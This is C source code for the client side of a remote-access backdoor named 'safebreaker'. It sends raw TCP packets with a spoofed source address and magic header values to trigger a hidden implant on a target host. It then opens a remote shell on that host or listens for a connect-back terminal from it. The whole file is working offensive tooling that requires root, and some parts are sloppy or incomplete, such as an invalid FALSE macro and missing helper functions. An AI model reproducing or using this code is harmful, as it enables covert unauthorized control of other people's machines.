/*
 * Written by Grid-Knight
 * http://www.informatik.uni-freiburg.de/~alsbiha
 *
 * Credits to:
 * 	-Richard W. Stevens, without his books, i would be lost 
 *	-newroot, i have learned much from you.
 *	-GNU, the gnutls is such a nice thing, with the best documentation i ever have seen.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <netdb.h>
#include <gnutls/gnutls.h>

// configuration file
#include "safebreaker.h"

#define TRUE	1
#define FALSE <=0

#define AUTHOR  "Grid-Knight"
#define VERSION "public alpha"

#define OPT_TERM	1
#define OPT_TERM_BACK	2

struct packet {
	struct ip     ip;
	struct tcphdr tcp;
	char data[1024];
};

struct tcp_pseudo {
	long src_addr;
	long dst_addr;
	unsigned int  dummy;
	unsigned int  proto;
	unsigned long length;
	struct tcphdr tcp;
} pseudohead;

struct help_checksum {
	struct tcp_pseudo pshd;
	struct tcphdr tcphd;
	char tcpdata[1024];
} tcp_chk_construct;

unsigned long int opt_flags;	

extern int errno;
extern int optind, opterr;
extern char *optarg;

void banner (char *);
void verbose (const char *, ...);
void error (const char *, ...);
int use(char *);

int tcp_packet (char *from, char *to, int port, int flags, char *data, size_t data_len);

int back_shell (int port);
int connect_shell(char *host, int port);

int tcp_packet (char *from, char *to, int port, int flags, char *data, size_t data_len) {

	struct sockaddr_in sin;
	unsigned long source;
        unsigned long dest;
	struct packet packet;
	int len;
	int thesock;
	const int on=1;

	thesock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
	setsockopt (thesock, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on));
	
	// zero the packet
	memset (&packet, 0x00, sizeof (struct packet));

	// random number
	srand (time(0));

	source = inet_addr(from);
	dest   = inet_addr(to);

	sin.sin_family = AF_INET;
	sin.sin_port    = htons (rand()%65535);
	sin.sin_addr.s_addr = dest;

	// ip header creation
	packet.ip.ip_v   = 4;
	packet.ip.ip_hl  = 5;
	packet.ip.ip_tos = 0;
	packet.ip.ip_len = htons(sizeof(struct ip));
	packet.ip.ip_ttl = 255;
	packet.ip.ip_off = 0;
	packet.ip.ip_id  = htons(MAGIC_ID);
	
	packet.ip.ip_p   = IPPROTO_TCP;
	packet.ip.ip_sum = 0;
	packet.ip.ip_dst.s_addr = dest; 
	packet.ip.ip_src.s_addr = source; 
	packet.ip.ip_sum = ip_fast_csum((unsigned char *)&packet.ip, sizeof(struct ip));

	// tcp header creation
	packet.tcp.source = htons(rand()%65535);
	packet.tcp.dest = htons(port);
	packet.tcp.seq = htonl(flags);
	packet.tcp.ack_seq = htonl(flags);
	packet.tcp.doff = 0;
	packet.tcp.res1 = 0;
	packet.tcp.urg = 0;
	packet.tcp.ack = MAGIC_ACK;
	packet.tcp.psh = 0;
	packet.tcp.rst = 0;
	packet.tcp.fin = 0;
	packet.tcp.syn = MAGIC_SYN;
	packet.tcp.window = 30845;
	packet.tcp.check = 1100;
	packet.tcp.urg_ptr = 0;

	if (data && data_len) {
		memcpy (&packet.data, data, (data_len > BUFSIZ-1?BUFSIZ-1:data_len));
	}

	pseudohead.src_addr = source; 
	pseudohead.dst_addr = dest; 
	pseudohead.dummy = 0;
	pseudohead.proto = IPPROTO_TCP;
	pseudohead.length=htons(sizeof(struct tcphdr)+data_len);
	memcpy (&pseudohead.tcp, &packet.tcp, 20);
	packet.tcp.check =  ip_fast_csum((unsigned char *)&pseudohead, 32);

  	sendto(thesock, &packet, (sizeof (struct ip) + sizeof (struct tcphdr) + (data_len > BUFSIZ-1?BUFSIZ-1:data_len)), 0, (struct sockaddr *) &sin, sizeof(sin));

	//client_ok("packet send");

  	fflush(stdout);
  	close (thesock);

	return 1;
}

int connect_shell (char *host, int port) {
        struct sockaddr_in sin;
        int thesock;
	int fd;
	int ret;
		
        thesock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

        sin.sin_family = AF_INET;
        sin.sin_port = htons (port);
        sin.sin_addr.s_addr = inet_addr(host);

	if ((connect (thesock, (struct sockaddr *) &sin, sizeof (struct sockaddr_in))) < 0) {
		client_error("connection to server failed");
	}
	
	client_ok("connection to server established");
	//Terminal
	get_terminal(thesock);
        return EXIT_SUCCESS;
}

int  term_back_shell (int port)
{
	struct sockaddr_in sh;
	int thesock;
	int clisock;
	int fromlen;
	const int on = 1;
	char tmp[BUFSIZ];
	fromlen = sizeof(sh);
	chdir ("/");
	umask(0);

	thesock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

	sh.sin_family = AF_INET;
	sh.sin_port = htons (port);
	sh.sin_addr.s_addr = INADDR_ANY;

	setsockopt(thesock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
	
	memset(&tmp,0x00,BUFSIZ);
	snprintf(tmp,BUFSIZ-1,"droping connect back terminal on port %d\n", ntohs (sh.sin_port));
	client_ok(tmp);

	bind (thesock, (struct sockaddr *) &sh, sizeof (sh));
	listen (thesock, 1);
	clisock = accept (thesock, (struct sockaddr *) &sh, &fromlen);
	get_terminal(clisock);
	return EXIT_SUCCESS;
}

int main (int argc, char **argv) {
	int c;
	int port = 0; 
	int dest_port = 22;
	int bounce_port = 0;
	
	char tmp[BUFSIZ];
	
	char bounce_command[BUFSIZ];
	char bounce_target[BUFSIZ];

	char packet_data[BUFSIZ];
	char source_ip[BUFSIZ];

	struct hostent *h;
	struct sockaddr_in src;
	struct sockaddr_in dest;
	struct sockaddr_in target;
	

	banner(argv[0]);
	if (argc !=9) {
		return use(argv[0]);
	}
	if (getuid())  {
		client_error("sorry you must be root");
	}

	memset (bounce_target, 0x00, BUFSIZ);
	memset (packet_data,   0x00, BUFSIZ);
	memset (source_ip,     0x00, BUFSIZ);

	while ( (c = getopt (argc, argv, "rchp:o:s:")) != -1 ) {
		switch (c) {
			case 'c':
				opt_flags |= OPT_TERM;
				client_ok("connecting to remote terminal");
			break;

			case 'r':
				opt_flags |= OPT_TERM_BACK;
				client_ok("connecting to connect back terminal");
			break;

			case 'p':
				port = atoi (optarg);
			break;

			case 'o':
				dest_port = atoi (optarg);
			break;

			case 's':
				strncpy (source_ip, optarg, BUFSIZ-1);
				memset(&tmp,0x00,BUFSIZ);
				snprintf(tmp,BUFSIZ-1,"setting source ip to %s\n", source_ip);
				client_ok(tmp);
			break;

			case 'h':
			default:
				return use(argv[0]);
			break;
		}
	}

	h = gethostbyname (argv[argc-1]);
	if (h == NULL) {
		memset(&tmp,0x00,BUFSIZ);
		snprintf(tmp,BUFSIZ-1,"cann't Resolve %s", argv[argc-1]);
		client_ok(tmp);
	}
	memcpy (&dest.sin_addr, h->h_addr_list[0], h->h_length);

	memset(&tmp,0x00,BUFSIZ);
	snprintf(tmp,BUFSIZ-1,"target host is %s (%s)", argv[argc-1], inet_ntoa(dest.sin_addr.s_addr));
	client_ok(tmp);
	
	if (!port) {
		 client_error("sorry you must define a target port");
	}

	if (opt_flags & OPT_TERM_BACK) {
		snprintf (packet_data , BUFSIZ-1, "%d:", port);
		tcp_packet(source_ip, (char *) inet_ntoa(dest.sin_addr.s_addr), dest_port, CMD_BACKTERM, packet_data, strlen (packet_data));
		term_back_shell (port);
	}

	if ((opt_flags & OPT_TERM )) {
		snprintf (packet_data , BUFSIZ-1, "%d:", port);
		tcp_packet(source_ip,(char *)  inet_ntoa(dest.sin_addr.s_addr), dest_port, CMD_TERM, packet_data, strlen(packet_data));
		sleep (1);
		connect_shell((char *) inet_ntoa(dest.sin_addr.s_addr), port);
	}
	return EXIT_SUCCESS;
}

void banner (char *args) {
        char line[BUFSIZ+1];
        int i, j;
        memset ((void *)line, 0x00, BUFSIZ);
        if (args[0] == '.' && args[1] == '/') {
                snprintf (line, BUFSIZ, "\033[1;34m%s\033[0m version %s written by \033[1;34m%s\033[0m", (args+2), VERSION, AUTHOR);
        } else {
                snprintf (line, BUFSIZ, "\033[1;34m%s[0m version %s written by \033[1;34m%s[0m", args, VERSION, AUTHOR);
        }
        fprintf(stderr, "%s\n", line);
        j = strlen (line)-22;
        memset (line, 0x00, BUFSIZ);
        for (i=0; i< j && i < BUFSIZ; i++) {
                line[i] = '~';
        }
        fprintf(stderr, "%s\n", line);
}

int use (char *args) {
	fprintf (stderr, "Use %s [options] <host> \n", args);
	fprintf (stderr, "\t-p\t<port>\t\t target port \n");
	fprintf (stderr, "\t-o\t<port>\t\t magic port \n");
 	fprintf (stderr, "\t-s\t<ip>\t\t your ip-address \n");
	fprintf (stderr, "\t-r\t\t\t connect back terminal mode \n");
	fprintf (stderr, "\t-c\t\t\t connect terminal \n");
	return EXIT_FAILURE;
}
